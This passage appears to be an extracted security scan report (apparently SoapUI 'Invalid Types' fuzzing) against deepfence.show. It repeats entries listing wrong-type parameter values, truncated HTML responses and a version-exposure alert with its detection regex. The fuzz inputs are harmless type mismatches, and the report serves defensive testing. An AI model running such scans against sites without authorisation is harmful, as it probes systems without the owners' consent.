href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.Issue Number #1958\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1959\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1960\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io294967295\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1961\nScan Invalid Types\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io65535\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1962\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io255\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1963\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1964\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ SoapUI is the bestdeepfence.io\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1965\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.Issue Number #1966\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# GpM7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1967\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 0FB7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1968\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1E4f\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1969\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# 12.45E+12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1970\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1.23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1971\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling 